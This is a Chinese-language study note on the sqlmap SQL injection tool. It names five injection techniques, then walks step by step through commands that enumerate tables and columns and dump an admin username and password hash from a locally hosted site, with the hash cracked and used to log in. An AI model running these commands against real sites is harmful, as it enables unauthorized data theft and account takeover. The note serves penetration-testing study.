Sqlmap的简单使用记录1,sqlmap:sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏
洞,目前支持的数据库是MySQL,Oracle,PostgreSQL,MicrosoftSQLServer,Micro
softAccess,IBMDB2,SQLite,Firebird,Sybase和SAPMaxDB。采用五种独特的S
QL注入技术,分别是:1)基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2)基于时间的盲注,即不能根据页面返回内容判断任
何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。3)基于报错注入,即页面会返回错误信息,或者把注入的
语句的结果直接返回在页面中。4)联合查询注入,可以使用union的情况下的注入。5)堆查询注入,可以同时执行多条语句的执行时的
注入。2,本地环境下实战。通过ssh连接kali,调用sqlmap。当然也可使用Windows下的sqlmap(主要原因是在学校中
虚拟机不能联网)。输入命令:sqlmap–u网址。检测是否存在sql注入点。如果存在则会返回网站服务器系统和数据库版本。C)
对本地搭建的网站进行sql注入。输入命令:sqlmap-uhttp://192.168.1.104/0/Production
/PRODUCT_DETAIL.asp?id=1512http://192.168.1.104/0/Production/PROD
UCT_DETAIL.asp?id=1512显示Access数据库。D)对数据库的表名进行暴力破解,输入命令:sqlmap-
uhttp://192.168.1.104/0/Production/PRODUCT_DETAIL.asp?id=1512ht
tp://192.168.1.104/0/Production/PRODUCT_DETAIL.asp?id=1512--tabl
estables就是表格的意思。进行暴力破解需要时间,得到结果:其中两个确定问题,一是问你是否用公共表进行暴力拆解,y。2是选
择多少线程进行暴力破解。破解后的到有用的数据库表名admin。根据经验admin就是用户的表名。E)破解完用户的表名,得到需要的,
泽需要破解列名。输入,命令:sqlmap-uhttp://192.168.1.104/0/Production/PRODUC
T_DETAIL.asp?id=1512http://192.168.1.104/0/Production/PRODUCT_DET
AIL.asp?id=1512–-columns–Tadmin解释:columns是列的意思。-Ttables简写
,—Tadmin就是按照admin拆解列名。得到结果,根据经验,password则为密码列,admin为用户名列F)破解数
据,使用命令:sqlmap-uhttp://192.168.1.104/0/Production/PRODUCT_DETAI
L.asp?id=1512http://192.168.1.104/0/Production/PRODUCT_DETAIL.asp
?id=1512–dump–C”admin,password”–Tadmin解释:--dump为下载其中的数据。破解其中
的用户名为admin密码为a48e190fafc257d3,此密码为MD5密码,使用网站破解后:bendss.G)最后一步,使
用http://192.168.1.104/0/adminhttp://192.168.1.104/0/admin登录,用户名和密码已知。其中,获取管理员界面登录需要工具。一会介绍。 |
|
